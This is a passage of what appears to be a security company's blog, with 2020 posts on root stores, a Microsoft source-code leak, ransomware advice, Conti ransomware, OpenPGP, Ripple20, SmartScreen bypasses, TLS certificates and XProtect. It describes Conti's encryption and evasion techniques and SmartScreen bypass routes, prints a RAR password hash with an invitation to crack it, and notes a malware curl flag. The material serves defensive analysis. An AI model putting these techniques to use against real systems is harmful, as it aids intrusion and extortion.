it defends the movement mainly talking about how this provides homogeneity on the platforms. Not in all of them, because it specially mentions that in iOS this step will be forbidden and therefore Chrome will continue using the root store imposed by Apple. For the rest, it explains its criteria for inclusion as a trusted root certificate (which in principle, are the standards). And that of course it will respond to incidents that undermine trust in the CA. But why would you want a Root Store? In 2019 Mozilla was once again reminded of why they had always done it and why it was necessary: mainly to "reflect their values" (which others may also translate as "interests"). But apart from the homogeneity that Mozilla also mentions, one sentence in its explanation that hits the nail on the head is: “In addition, OS vendors often serve customers in government and industry in addition to their end users, putting them in a position to sometimes make root store decisions that Mozilla would not consider to be in the best interest of individuals.”. Mozilla does not trust them. It also mentions that the fact that the operating system inserts certificates to analyse traffic in its Root Store (such as the antivirus), it does not affect them. Always putting individual freedoms first, as it did by imposing the DoH and forcing a certain choice between security and privacy. What about Google's motivations? Will they be similar? On paper yes, they want homogeneity. But let's not forget that whoever controls it, as Mozilla subtly reminded us, deciding on the Root Store independently of the operating system also makes it possible to choose who, at any given time, can access the encrypted traffic. Apart from being a headache for the administrator. So, in the end it seems to be, again, a question of trust... or maybe mistrust? Chrome, once mature and with a great influence on the market, wants us to trust them and their policy of access to the Root Store. This in turn (in the light of the reasons given by Mozilla) ... could this not be interpreted as a slight mistrust of the platform where Chrome runs? Is this not a further step in the distancing of the CAs themselves? An attempt, after all, to have more control?
November 9, 2020
Cyber Security
Curiosities About Windows XP Code Leak
A few days ago, attention was focused on Reddit, within a community that is characterised by its conspiracy theories. According to the news it consisted of filtering 43 GBs of data from "Windows XP" but, according to the name of the Torrent (more accurate), what was filtered was "Microsoft leaked source code archive", because it actually contained much more. This is a compilation of previous leaks, documents, documentaries, images... and yes, unpublished source code. More than half of the content is fact made up of all of Microsoft's patents, up to 27 GB in compressed form. Let's have a look at other curiosities Directory and File Analysis Here is an example of what it can be downloaded: The description of Torrent itself makes this clear. Included in this Torrent are: MS-DOS 3.30 OEM Adaptation Kit (source code) MS-DOS 6.0 (source code) DDKs / WDKs stretching from Win 3.11 to Windows 7 (source code) Windows NT 3.5 (source code) Windows NT 4 (source code) Windows 2000 (source code) Windows XP SP1 (source code) Windows Server 2003 (build 3790) (source code) (file name is 'nt5src.7z') Windows CE 3.0 Platform Builder (source code) Windows CE 4.2 Shared Source (source code) Windows CE 5.0 Shared Source (source code) Windows CE 6.0 R3 Shared Source (source code) Windows Embedded Compact 7.0 Shared Source (source code) Windows Embedded Compact 2013 (CE 8.0) Shared Source (source code) Windows 10 Shared Source Kit (source code) Windows Research Kernel 1.2 (source code) Xbox Live (source code) (most recent copyright notice in the code says 2009) Xbox OS (source code) (both the "Barnabas" release from 2002, and the leak that happened in May 2020) We have indicated the most relevant part in bold since, about the rest, much was already known from previous leaks. For example, in May 2020 the original Xbox and NT 3.5 code was leaked; in 2017, some parts of Windows 10; and in 2004, some parts of NT and 2000. We show here the complete TXT justifying what the Torrent consists of. The PDF section is nothing to be missed, mostly because of the value of gathering so much documentation and news about code disclosures. A Mysterious Encrypted RAR The leak contains an encrypted RAR (Windows_xp_source.rar), and the person including it appeals to the community to try to decrypt the password. "Including 'windows_xp_source.rar' in this collection, even though it's password protected. Maybe someone can crack (or guess) the password and see what's inside. The archive is bigger than the other XP / Neptune source tree. It might be genuine, it might not. But I'm including it just in case, since the file was so hard to track down. Original upload date seems to have been around 2007 or 2008. The hash key is: $RAR3$*0*c9292efa2e495f90*044d2e5042869449c10f890c1cced438" ¿Is This relevant? What is important, therefore, and seems to be new, is the source code of kernel 5 from 2003 and largely shared by XP as well. Nt5src.7z, which is about 2.4 gigabytes and when decompressed reaches about 10 GB. It seems that the code is very complete, but it is not known if it contains enough to compile it. The vast majority of the files are dated 2 September 2002. The Service Pack was officially released on the 9th. With respect to whether this leak is a security threat, it will help detect or analyse potential vulnerabilities that are still preserved in Windows 10 by inherited code much faster. Attackers will be able, once an opportunity for flaw has been identified, to better understand why it occurs if they go to the clear code portion. And not just the inherited parts in Windows 10. Windows XP and 2003 themselves are still found on a good number of important systems. Truth be told that since 2014, when their support was stopped, administrators have other problems added if they still maintain this system. But this can make it worse. Not much more, but it is important. In any case, any researcher looking for vulnerabilities in the code would start from comments... where programmers reflect doubts, fears and... potential cracks. A simple search by "WARNING:" gives us some interesting idea of what things can go wrong in the code, according to the programmers themselves. Some of them will be mare curiosities and others could be seen as potential security problems. Here are some examples. It makes no checks on buffer… It could break everything... It is very annoying to look at… Never ever change the order or you break backwards compatibility... Overflow... I really don´t like this but... JlJmIhClBsr Chain We didn't want to forget that in the code related to the file sharing, there is the JlJmIhClBsr chain, something curious that can indicate that the NSA already had access to the Windows code (this would not be strange at all) but that also implied that it made a mistake when creating the exploit of EnternalBlue. Because by including that chain, which was in the source code, it is not very well known why, it was adding (without being aware of it) a kind of very relevant IDS signature to know if someone was being attacked by the EternalBlue exploit. This is very curious because it would also imply that the NSA created the exploit by fixing or adapting the source code directly. When the exploit was made public, WannaCry, created under EternalBlue, also inherited that chain. However, it was useless and when it was ported to Metasploit it was simply removed. At the time, we already investigated and verified that in reality this chain JlJmIhClBsr would only have one use: to serve perfectly as a signature or mark to detect the network attack. A mislead from the NSA. Part of the svrcall.c code
September 28, 2020
Cyber Security
What Do Criminals in the Ransomware Industry Recommend so that Ransomware Does Not Affect You?
We all know the security recommendations offered by professionals on malware protection. Frequently: use common sense (personally, one of the least applicable and abstract pieces of advice that can be given), use an anti-virus, a firewall (?)... All of them good intentions that are not practical, very repeated yet not very effective. Users and companies still get infected. So, what if, for a change, we listen to the creators of ransomware themselves? Wouldn´t they most certainly have a more practical and realistic vision of what to do to avoid their own attack? What are their recommendations against their own selves? First of all, a distinction must be made between homemade ransomware and professional ransomware. In the first one, the target is any individual's random computer, the one that doesn’t apply protection recommendation can be affected. The second one is the ransomware developed with a specific company as a target. The attackers will spend months planning the attack, probably weeks inside the network and within minutes they will encrypt everything they can to ask for a millionaire ransom. And once affected, little can be done. Garmin has recently paid and so has CWT, a US business travel and event management company that has just paid $4.5 million to decode its own data. The deal with the attacking negotiator has been by chat and has been made public. The transcription shows the management of any business between professionals. Let's have a look at the recommendations that the "bad" negotiator made to the CWT representative and analyse the effectiveness. Anti-Ransomware Recommendations It is worth stressing that these are recommendations from the attackers themselves in order to help large companies attacked by professional ransomware. Let's check them out and analyse if they are suitable. List of recommendations. Source: Twitter Jack Stubbs Disable local passwords On systems and servers controlled by Domain Controller, it is a good idea not to use local users and to focus on those of the domain controller. This improves traceability and reduces exposure. Good recommendation. Force the end of administrators' sessions when attackers are already on the network at ease, they will try to escalate to the administrator domain and open sessions with it, otherwise they will not be able to encrypt everything important and the backups. It is a good idea that these sessions come to an end, to have an expiration date and that they are fully monitored. Avoid WDigest (Digest Authentication) used in LDAP, store the passwords in the memory The attacker here refers, veiled and almost certainly, to Mimikatz and how it most likely recovers the domain controller administrator password and escalates privileges thanks to this tool. If a certain Windows value is set to zero, they will not be able to see the password clearly and the elevation will be complicated for the attackers. Excellent recommendation. Monthly passwords updates There is a lot of controversy about updating passwords. Users find it tedious to update their passwords monthly and end up writing them down or following a pattern. But for administrators (which is where criminal is target) it makes sense. Attackers may spend more than a month on a network without revealing themselves, studying when it is the best time to launch the most effective attack. Changing passwords, which they have probably already divd out, can force them to rethink the attack and may undo much of their work. Interesting recommendation. Reduce user permissions to access only the essential Well, this is a common recommendation. It also very probably refers to how attackers manage, from a simple user, to increase privileges thanks to the negligence in the segmentation of permissions and privileges. Applocker and the use of the necessary applications This is every network administrator's dream: to be able to have a whitelist of applications that users can run and ignore the rest. With AppLocker, already integrated in Windows, this would be enough. It works very well and allows you to limit by certificate, location, etc. Attackers would not be able to download their tools and launch them in order to increase privileges. It is an excellent, complex measure to implement yet not impossible. Don't count on anti-virus in short term Well, unfortunately, we have already explained this on many occasions. Antivirus (as such) is not the best solution for early detection. "Don't count on them”. Here, the attacker claims that anti-viruses could work in a long term, as something reactive. And unfortunately, he is right. Anti-viruses as such are a reactive element and that is where they work best: as a system for detecting and eradicating an infection when it has already occurred. To prevent, it is reasonable to use a much broader set of measures. Furthermore, he points out that the anti-virus is only useful if the attacker "for some reason does not attack in a short term". He suggests that professional attackers are rarely impulsive. He adds that they take their time to analyse the victim and strike effectively. Install an EDR (EndPoint Detection and Response) and efficient technicians to work with it An EDR is more than just an anti-virus, it is actually aimed at early detection, at analysing what is happening in the system in real time, beyond the traditional anti-virus firms. And yes, that could be useful. But the subtlety touch added by the attacker is interesting: not only that they use it but also that "the technicians work with it". As with any software, there is no point in setting up the EDR if it is not properly condivd, known, worked on and monitored. Work 24/7 For large companies, the attacker recommends three eight-hour shifts for managers, covering 24 hours a day. This means that attackers will most likely look for times when administrators are not working to launch attacks, side moves, or privilege elevations. If they manage to do so without alarms being raised (and checked), then they can wipe out the tracks. So full shifts of "human surveillance" are important. Conclusions Bearing in mind that they have just charged $4.5 million for a ransom they themselves have provoked, the attacker undoubtedly belongs to a professional group that knows exactly what they are doing. The recommendations seem sincere and, although it may seem counterproductive, aimed at hindering their own work. Why reveal these tricks? They communicate it exclusively to their victim (who let´s recall, has just paid) as an act of professionalism. They have completed a transaction between "professionals" for a service and so they give a "bonus" of information. Like the plumber who, after fixing a pipe blockage, advises you before he leaves, while he is billing you, on how to prevent the sink from getting stuck again. No plumber would deny this little tip thinking he wasted opportunities by doing so. On the contrary, as a good professional, the attacker needs to generate confidence because the next time he attacks a big company and demands a few million, he wants them to know that paying is the best option to recover their data. Treat your present and future clients well... even if they are victims. But even if these tips have been leaked, we assume that they don´t really mind. There are thousands of large companies out there who will not listen. Due to their ignorance or lack of resources, who knows, but they will still be potential victims. Attackers can afford to give advice on how to stop them from attacking and still enjoy a sufficient surface to maintain a prosperous business. Download our new guide created in partnership with Palo Alto to help you prepare, plan, and respond to Ransomware attacks
August 4, 2020
Cyber Security
Conti, the Fastest Ransomware in the West: 32 Parallel CPU Threads, but… What for?
Anyone who thinks that “retail” ransomware that infects system users and claims a ransom is a threat, may not be aware of the ransomware used against company networks. After years among us, ransomware has developed. It has industrialised, specialised and acquired a sophisticated appearance to target far more lucrative victims. Conti, the fastest ransomware, is just one example of the speed at which they are developing. Let’s look at some of its tricks and why they are used. Carbon Black has led the analysis of Conti’s latest version, discovering new levels of sophistication, because where the real action and true innovation in malware takes place is in the attacks directed at companies. These attacks are usually disguised as regular e-mails with attached files, such as an Excel or Word file with macros or that exploit Office’s vulnerabilities. They move laterally until they become attached to a specific server and wait to strike. From here, they launch data hijacking attacks and ask for millionaire ransoms in exchange for the company to continue with its normal operation. The crafted ransomware that affects user systems is an annoying prank compared to this. But let’s see how these attackers have become more sophisticated and why. The Fastest in the West Conti uses 32 simultaneous CPU threads. These allow it to encrypt a whole hard-disk quickly or any other file that gets in its way. It is like sending 32 copies of a “normal” ransomware in parallel. Why do they do this? Why do they want to go so fast? These attacks are usually launched when they are already located in a powerful server availing itself of all the privileges within the company’s network (normally in the local domain control). The system is assumed to be powerful in CPU and capable of launching all these threads. It also allows it to attack systems with a hard-disk that has the capacity to store large amounts of data (also backup). The faster the ransomware, the simpler it will be to go unnoticed by any alert system, whether it is reactive or preventive. It will always be too late. Hide the Hand That Throws the Stone Another interesting feature of Conti is that, again attached to a server, it can attack the surrounding network and encrypt the shared drives of neighbouring systems. In this way, network administrators will not know where the attack is coming from because it is natural to think that the machine containing the encrypted files is the infected one. Not at all: patient zero can be far, triggering very fast encryptions willy-nilly. ARP Avoid Making Noise Using ARP To find out which machines are around you, you have two options: analyse the IPs of the network itself and go through the range, or use an ARP-a and find out which machines you have recently contacted. This is exactly what Conti does. For Conti, a Locked File Is Not a Problem If you are on a server with a rich database, normally your data will always be "locked" by the operating system or the database itself. Encrypting them will be impossible because you cannot handle a file that belongs to a process holding it exclusively. From the attackers' point of view: How to encrypt it then? First, Conti kills any process including "sql" in its name. Very few families use in addition the trick used by this ransomware to encrypt the files, which consists of using Restart Manager, the formula that Windows itself uses to cleanly kill the processes before shutting down the operating system. It is like killing processes cleanly like Windows before rebooting, but without the need to reboot. And this is also where you need speed and the reason for having 32 threads. Killing a critical process is very noisy, administrators will notice right away that something is going wrong. From a malware point of view, if you have a lot of heavy files, the best option is to encrypt them quickly after killing the parent process if you want to achieve your goal. Encrypts All Extensions Except exe, dll, lnk, and sys Conti is very aggressive. Most "homemade" ransomware looks for potentially useful extensions for the victim. Documents, photos, data, etc. Conti encrypts everything but executables, binaries, and drivers. To speed up, it avoids some system directories. Of course, all this does not prevent ransomware from having the usual technologies for this type of attack. From the deletion of shadow copies (although in a special way) to the public keys that encrypt the 256-bit AES key embedded in each encrypted file. Finally, the value of the analysis of this sample is greater when it is known to obfuscate its own code in a special way. Conti tries to hide every string, every system API call using a different algorithm for it with different keys, and so up to 277 functions (algorithms) used internally only to de-obfuscate itself “on the fly”.
July 27, 2020
Cyber Security
OpenPGP: Desperately Seeking Kristian
A year ago, OpenPGP was suffering from a problem of vandalism in its key servers. The system was dying and needed a change that was not trivial without betraying principles based on a 1990s Internet, naive in today's eyes. Recently, a simple anecdote shows once again some serious shortcomings, an anachronism unworthy of today's networks. An unbreakable will but unable to adapt to the new times that continues to seek Kristian desperately. What's Happened? Key servers (SKS) are essential to the OpenPGP infrastructure. They ensure that we can locate people's public keys. They allow these keys to be incorporated into the system and ensure that they are never lost and replicated to provide availability. To interact with them, the OpenPGP HTTP Keyserver protocol (HKP) is used. Through port 11371 keys can be uploaded and searched. Public servers have never worked properly, and they have too many shortcomings. To test it, just connect to any key system (such as https://pgp.mit.edu) and search for keys. After several server errors (and adapting the eye to the 90s aesthetics), you may have the answer. It's the same with https://keys.gnupg.net, https://pgp.key-server.io or any other. Unreliable and poorly-maintained servers are the root of public cryptography. HKP over TLS is called HKPS. The hkps.pool.sks-keyservers.net server is responsible for the "pool" of HKPS servers that brings them together, arranges and "sorts" them from a DNS point of view so that they can be known and coordinated. To join the pool, servers must be validated and certified by their own CA, that allows their encrypted communication. This CA has been maintained manually by a single person for more than 10 years: Kristian Fiskerstrand. The point is that Todd Fleisher, who manages one of those servers, had his certificate expired, one that allowed him to communicate with the main server and stay within the pool, therefore coordinated with the remaining servers. He tried "desperately" to contact Kristian for a month. Time was against him. Kristian gave no sign of life, neither by mail nor on social networks. Finally, his certificate expired, and he had to get one from Let's Encrypt just to keep encrypting communications. He was aware that the pool hkps.pool.sks-keyservers.net would not trust him, but at least it allowed him to keep working without synchronisation. Shortly after, Kristian replied. Without giving any further reasons, he said he had been on other business during the last month. He renewed his certificate. If it had taken longer, the other servers would have expired, and the pool would have ignored them. Why Did This Happen? Because a centralised critical point (that makes it possible the decentralised use of OpenPGP) is in the hands of a single person who voluntarily maintains it. A system from another decade (and not even the last one) prone to errors, failures and dependent on good will. Romantic but impractical. We love free software, but let's not forget that it also requires funding so that not just one person, but a team, can invest the corresponding time. Because we're talking about a free encryption system, whose grandfather was the standard-bearer of cypherpunk in the 90s, and which Phil Zimmerman fought for. Let's remember that until the year 2000, the export of cryptography outside the United States was very limited. This is not the only problem with OpenPGP. Thunderbird, a classic that has experienced all kinds of problems (Mozilla wanted to get rid of it for a while to focus its efforts on Firefox) gave good news. In October 2019 Mozilla announced that it wanted to add native OpenPGP support to its Thunderbird email client. This meant removing its Enigmail extension, the queen for managing S/MIME and OpenPGP in the mail. This fact brought to light some realities of the software world that, in the field of free and open source, are perhaps more surprising because of the expectations generated. Enigmail works almost miraculously. This means that Enigmail's interface uses command line calls and collects the result that redraws in Thunderbird, with all the problems that this can entail. This is certainly not an ideal scenario, but it has been done for many, many years and nothing better has come up. Enigmail is a project of a few people in their free time living on donations. They've been maintaining it for over 15 years and, when they know they're going to have to kill it, they even offer to help the Thunderbird development team get it integrated. Even so, Thunderbird had to face licensing issues to incorporate encryption into its client natively, but there was a condition: if the effort made Mozilla lose focus on Firefox, it wouldn't be worth it. However, it seems that it's almost integrated. We can see the following message in the latest versions of Thunderbird: This essentially means that they haven't been able to make the two systems compatible for a while, neither Enigmail nor the new integrated system are working well in the latest versions. They haven't had time. So you have to choose an outdated version of Thunderbird if you want to use OpenPGP with Enigmail for a period. What Else Is Going to Happen? A critical system can't be maintained by good will. It requires critical mass of use (beyond promotion), investment (and not just donations), collaborations (beyond good words), infrastructure and people. Above all, people. It cannot depend on literally one single technician for a critical part of the system, because he puts all its functionality at risk. Free software can't be seeking Kristian desperately.
June 29, 2020
Cyber Security
Ripple20: Internet Broken Down Again
This time, we found that Ripple20 affects the implementation of the TCP stack of billions of IoT devices. They are thought to be 0-Day attacks, but they are not (there is no evidence that they have been exploited by attackers), and besides, a part of them has already been fixed before being announced. But this does not make these vulnerabilities less serious. Given the large number of exposed devices, has the Internet broken down again? The Department of Homeland Security and the CISA ICS-CERT announced it. There are 19 different issues in the implementation of Treck's TCP/IP stack. As this implementation provides or licenses an infinity of brands (almost 80 identified) and IoT devices, the affected ones are, indeed, billions. And, by nature, many of them will never be patched. What Happened? JSOF has performed a thorough analysis of the stack and found all kinds of issues. A meticulous audit has inevitably found four critical vulnerabilities, many serious and others minor. They could allow everything from full control of the device to traffic poisoning and denial of service. The reason for such optimism is that they have developed an eye-catching logo and name for the bugs, and have privately reported the vulnerabilities, so many have already been fixed by Treck and other companies using their implementation. Reasons for pessimism are that others have not been fixed, and it is difficult to trace the affected brands and models (66 brands are pending confirmation). In any case, another important fact to highlight is that these devices are usually in industrial plants, hospitals, and other critical infrastructure where a serious vulnerability could trigger horrible consequences. So, the only thing left to do is to audit, understand and mitigate the issue on a case-by-case basis to know if a system is really at risk. This should already be done under a mature security plan (including OT environments) but, in any case, it could serve as an incentive to achieve it. Why? Because they are serious, public bugs in the guts of devices used for critical operations: A real sword of Damocles. In any case, they are already known so it is possible to protect ourselves or mitigate the problem, as happened in the past with other serious problems affecting millions of connected devices. With them it seemed that the Internet was going to break down but, we kept going. And the reason was not that they were not serious (or even, probably, exploited by third parties), but because we knew how to respond to them in time and form. We should not underestimate them, but precisely continue to attach importance to them so that they do not lose it, but always avoiding catastrophic headlines. Let us review some historical cases. Other "Apocalypse" in Cybersecurity There have already been other cases of disasters that would affect the network as we know it and about which many pessimistic headlines have been written. Let us look at some examples: The first was the "Y2K bug". Although it did not have an official logo from the beginning, did have its own brand (Y2K). Those were other times and, in the end, it was a kind of apocalyptic disappointment resulting in a lot of literature and some TV films. The 2008 Debian Cryptographic Apocalypse: A line of code in the OpenSSL package that helped generate entropy when calculating the public and private key pair was removed in 2006. The keys generated with it were no longer reliable or secure. Kaminsky and DNS in 2008: It was an inherent flaw in the protocol, not an implementation issue. Dan Kaminsky discovered it without providing details. A few weeks later, Thomas Dullien published in his blog his particular vision of what the problem could be and he was right: it was possible to forge (through the continuous sending of certain traffic) the responses of the authorised servers of a domain. Twelve years later, even after that catastrophe, DNSSEC is still "a rarity". "Large-scale" spying with BGP: In August 2008, people were talking again about the greatest known vulnerability on the Internet. Tony Kapela and Alex Pilosov tested a new technique (believed to be theoretical) that allowed Internet traffic to be intercepted on a global scale. This was a design flaw in the Border Gateway Protocol (BGP) that would allow all unencrypted Internet traffic to be intercepted and even modified. Heartbleed in 2014 provided again the possibility to know the private keys on exposed servers. In addition, it created the "brand" vulnerabilities, because the apocalypse must also be sold. A logo and an exclusive page were designed with a template that would become the standard, a domain was reserved, a kind of communication campaign was orchestrated, exaggerations were spread, care was taken over timing, etc. It opened the path to a new way of notifying, communicating and spreading security bugs, although curiously the technical short-term effect was different: the certificate revocation system was tested and, indeed, it was not up to the task. Spectre/Meltdown in 2017 (and since then many other processor bugs): This type of flaw had some very interesting elements to be an important innovation. These were hardware design flaws on the processor. Rarely had we witnessed a note in CERT.org where it was so openly proposed to change the hardware in order to fix an issue. However, if we view it prospectively, so far it seems that none of these vulnerabilities have ever been used as a method of massive attack to collapse the Internet and "break it down". Fortunately, the responsibility of all the actors within the industry has served to avoid the worst-case scenario. Unfortunately, we have experienced serious issues within the network, but they have been caused by other much less significant bugs, based on "traditional worms" such as WannaCry. This perhaps shows an interesting perspective on, on the one hand, the maturity of the industry and, on the other hand, the huge work still to be done in some even simpler areas.
June 22, 2020
Cyber Security
Most Software Handling Files Overlooks SmartScreen in Windows
SmartScreen is a component of Windows Defender aimed at protecting users against potentially harmful attacks, whether in the form of links or files. When a user is browsing the Internet, the filter or SmartScreen component analyses the sites visited by the user and, if the user access a website considered suspicious, it displays a warning message so that the user can decide whether to continue or not. But it also warns about downloaded files. We have conducted a study on how SmartScreen works particularly in this area and have tried to understand what triggers this protection component developed by Microsoft in order to better understand its effectiveness. How Does SmartScreen Know Which File to Analyse? Alternate Data Streams or ADS is a feature of the NT file system that allows metadata to be stored in a file, whether by a stream directly or by another file. Currently ADSs are also used by different products to tag files in the “:Zone.Identifier” stream so that you know when a file is external (i.e. not created on your own computer) and therefore needs to be examined by SmartScreen. Microsoft began tagging all files downloaded through Internet Explorer (at the time), and other browser developers began doing the same to take advantage of SmartScreen's protection. The value written to the stream, i.e. the ZoneId, can have the value that you wish. However, SmartScreen's behaviour is based on the values reflected in the table below: Activating the value in any file is easy by command line: Do Browsers Use This Feature to Tag Files? We analysed the 10 most used browsers in desktop operating systems. To do this, we downloaded a file from a web page. Is the ZoneId added to the downloaded file? In most cases it is. What about FTP, Code Versioning, Cloud Sync or File Transfer Clients? We now examine other programs capable of downloading files. For example, most email clients do not add the ZoneId to be scanned by SmartScreen. However, many desktop instant messaging clients do. No FTP, code versioning, or cloud sync client adds the appropriate ZoneID, so files obtained by this means will not be analysed by SmartScreen. Nor do cloud sync clients worry about tagging files. The same goes for the integrated file transfer mechanisms in Windows. At least, WinZip and the native Windows decompressor do respect this option if it is decompressed after the download. Potential Evasions After understanding how and when the file is tagged, the research led us to reflect on which process is responsible for running SmartScreen and whether there are ways to bypass that process. To conduct the test, we mostly tagged files that were interpreted and known by SmartScreen as malicious to find out whether or not the file executed in this way was bypassing SmartScreen. We took a series of files in different interpreted languages and set the bit, as mentioned above. The result can be seen in the following table: Perhaps the most interesting point is the difference when launching them by using the start command: Where SmartScreen gets in the way of PowerShell, but not in the way of CMD. Conclusions In the following table, we can observe the percentage of those who do NOT implement ZoneId when the file is downloaded to be analysed by SmartScreen: In general, we can conclude that a potential attacker would have several ways to get a malicious file onto a computer with greater chances of not being discovered by SmartScreen: by relying on the user to download executables through certain programs. We believe that it is necessary for both developers and users to be aware of how SmartScreen works in order to take advantage of its detection capabilities and better protect the user. The full report is available here:
June 16, 2020
Cyber Security
More and Shorter Certificates with a Lower Lifetime: Where Is TLS Going to?
These are turbulent times for cryptography. Although the ordinary user does not perceive it, the world of encrypted and authenticated websites (although this does not make them safe) is going through a deep renewal of everything established. Something in principle as immutable as cryptography is going through a strange moment and we don't know how it will end. Of course, what is certain is that we must modify our traditional beliefs about how the web works. Let’s review some recent events that will turn everything upside down. Apple and Its Increasingly Shorter Certificates Browsers have been steering the course of the Internet and, in particular, cryptography. Chrome has long been in a relentless fight to do away with HTTP and try to make everything HTTPS. It has been with the “increasingly” strategy for years, flagging as insecure those webpages that do not have encryption and authentication and, in turn, raising the security standard of those that do. For instance, setting aside certificates that use SHA1. First on the sheet, in the middle, etc. But this time, curiously, it was not Chrome but Apple with Safari the one which has decided to shorten the lifetime of the certificates to a year. This has been discussed and voted several times by the agents involved. The browsers wanted it to be a maximum of one year, the CAs did not. Now Safari says it will flag certificates of more than one year from September 2020 as invalid. The main agents of the Internet and the CAs voted in September 2019 if the lifetime of the TLS / SSL certificates should be reduced (even more), forcing them to have a maximum lifetime. The result was (again) no. 35% voted for the reduction, including Google, Cisco, Apple, Microsoft, Mozilla, Opera and Qihoo360. The rest, particularly the CAs, voted against, so we officially continue with the maximum certificates' lifetime of 825 days. However, in February, at the CA/B Forum in Bratislava, Apple announced that its maximum will be 398 days. Just like that, without notice or statements about it. From September 1, it will flag as distrusted the certificates created from that date and whose lifetime is more than 398 days. Will this sweep the other browsers along? The whole industry? Safari, thanks to iPhone, has 18% of the market, so it has enough popularity to push it. In our view, it is a way of taking the pulse of their own leadership. Facebook and Its Ephemeral Certificates There are essentially three technologies that browsers can implement to check the revocation status of a digital certificate: The downloadable revocation blacklist known as Certificate Revocation List (CRL), defined in RFC 5280. History has shown that it does not work. OCSP, defined in RFC 6960. OCSP works with a request-response mechanism that requests information about a specific certificate from the CA. The most effective so far (without really being it) is the OCSP Staple required variant, but it is not widely used. CRLSets: it is a "fast" revocation method used only in Chrome, as it is said, for "emergency situations". They are a set of certificates that gather information from other CRLs, are downloaded from a server and are processed by Chrome. Although the method is fully transparent, the management of which certificates are on the list is completely opaque and the certificates used to update it are not known (unless it may be found by other means). As none of this works as it should, the ‘delegated credentials’ are born. They mean shortening to a few hours the certificates’ lifetime, but not exactly, although they play with the concept of the ephemeral to tackle the problem. What a server will do is sign with its certificate small data structures valid for days or hours and delegate them to the servers that will actually manage the TLS with the browser. That is, instead of creating shorter certificates signed by the intermediate CA and deploying them, they are simplified into a kind of ‘mini-certificates’ signed by the leaf certificate. With the leaf certificate’s private key, we leave behind all the complexity of the intermediate and root CAs. The system would delegate this delegated credential to the front-end servers and, if the browser supports it, the system would verify it rather than the ‘traditional’ certificate. If the delegated credential is signed by the leaf certificate (it has the public key to verify it), then the public key in the delegated credential itself is used for the TLS connection and not the certificate’s public one. This is the key: there is a much more dynamic formula in case of revocation that would not depend on any CA and that would be very quick to deploy (as soon as the delegated credentials expired, attackers looked for others and could not sign them). In addition, it is not necessary to leave the private key on all servers or intermediate proxies. A single server could serve all credentials delegated to web servers, balancers, etc. Let’s Encrypt and Its Large Certificates Let’s Encrypt broke off the engagement and offered free certificates that may be issued automatically. Their philosophy was to go towards ‘HTTPS everywhere’ and not have to pay for it. Their first certificate was born in September 2015. In June 2017 they had issued 100 million certificates and on February 27 they reached a billion certificates. That’s a lot of certificates and means a clear success of the company involved, but also a little problem for other projects such as Certificate Transparency. While it cannot be used for revocation, it does allow all certificates (fraudulent or not) to be registered and, therefore, it is easier to detect the fraudulent ones and then revoke them by the "usual" methods. Certificate Transparency was already born with a privacy issue, and delayed its enforceability for several reasons: implementations that were not achieved, headers that were adopted with very little room, RFCs that were starting too tight, and so on. Even so, Certificate Transparency is in good health (or at least not as bad as HPKP), but Google has been overly ambitious with the proposal. Bringing together so many actors is complicated, even more so in such a critical environment as TLS security. Moreover, it now faces an insane growth that may complicate infrastructure. Source: sslmate.com Some Certificate Transparency logs are close to one billion certificates. To better manage this system that aims to cover everything and be ‘read only’, they ended up creating logs for years. The certificates that expire within those years get into different log servers that later (normally) will no longer receive certificates. Source: sslmate.com But if we take, for example, Google Argon 2019 servers (already almost stable at 850 million certificates throughout 2019) and compare it with Argon 2020, we see that the latter has 400 million in just two months, almost half of the former. At this rate, it would reach 2400 million certificates (if not more) thanks precisely to the growth of Let’s Encrypt and the policy of increasingly shorter certificates. Source: sslmate.com How will all this fit into the future TLS ecosystem? We will see it little by little.
March 2, 2020
Cyber Security
Apple introduces up to 14 signatures in XProtect given the malware flood for Mac
Shlayer malware is on one out of ten Mac computers. And it has been like that for two years. It is malware that mainly attacks the advertising system. Given this overwhelming statement (10% of infected operating systems and a campaign that has been going on for two years now) we considered one question: what is the operating system doing to defend itself? We are aware that XProtect, the built-in anti-malware software, detects poorly and badly. But how has it responded to an epidemic of such dimensions? Shlayer Trojan We won’t well on its functioning because already provides all the details. It is interesting to know that it usually pretends to be a Flash update that downloads an encrypted file. This, once decrypted, downloads the real Trojan with curl. Code from the image will deobfuscate a file that will end up doing something like this: This in turn will lead to the installation of the most aggressive adware. This simple behavior has given users more than a headache for two years now. By the way, that curl -F0L is their "trademark", because they are not usual curl parameters. What is XProtect XProtect is a basic signature-based malware detection system that was introduced in September 2009. It constitutes a first approach to an antivirus integrated into MacOS. Currently, XProtect has some more signatures that may be clearly found (malware name and detection pattern) in this path: /System/Library/CoreServices/XProtect.bundle/Contents/Resources/ XProtect contains signatures on the one hand, and Yara rules on the other hand (it is defined by XProtect.plist and Xprotect.yara on that directory), and with both systems malware is detected and defined. GateKeeper is supported by both; it monitors and sends it to them. The list XProtect.plist is public. Number 3 from the URL refers to Mountain Lion. When 2 is modified, Lion signature file may be viewed, and 1 corresponds to Snow Leopard. Apple does not seem keen to talk too much about it. Let’s go forward with the initial question. Another complementary script to the most popular malware for Mac Has Apple taken the matter into their own hands? Yes, but only recently, when they introduced several Yara rules to detect these signatures (which in principle are a mystery and no details are offered about the rules). For example, on January 22nd the following 4 rules were introduced: MACOS.8283b86, MACOS.b264ff6, MACOS.f3edc61 and MACOS.60a3d68. A few days before, on January 7th, 3 additional signatures or Yara rules were introduced: MACOS_5af1486, MACOS_03b5cbe and MACOS_ce3281e. And in December, 7 more were introduced: MACOS_9bdf6ec, MACOS_e79dc35, MACOS_d92d83c, MACOS.0e62876, MACOS.de444f2, MACOS.b70290c and MACOS.22d71e9. This results in a total of 14 signatures in two months. Considering that in 10 years they accumulate a little more than 100 signatures, it may be concluded that they have worked hard in the last months. It is not usual to have so many signatures in such a short space of time, so yes, it seems that they are lately worried about malware on Mac. Now we ask ourselves another question: Are these rules effective? With these Yara rules of XProtect we have performed a retrohunting in VirusTotal to see since when malware of this type exists. This is an investigation that involves searching back in time for files that meet certain Yara rules. VirusTotal will give back as many samples that meet these rules and will give us an idea of how many have appeared over time. Over 1,000 samples were found in less than three months. The interesting point is that there are samples since well before December 2019 (when they began to introduce detection rules in XProtect). This suggests that in some way these protection rules added by Mac during these months are late. Exploring the results of the retrohunt, we located samples that were not hunted by antiviruses. In principle, we thought that these were false positives, but a subsequent analysis showed that they are rules for detecting browser plugins and specific adware, such as: Wharkike, EngineFiles, ContentBenefits, ForwardOpen-extension… This leads us to an interesting conclusion: XProtect detects adware (search engines mainly) not detected by any antivirus. However, it seems that some false positives have crept into (we believe that the 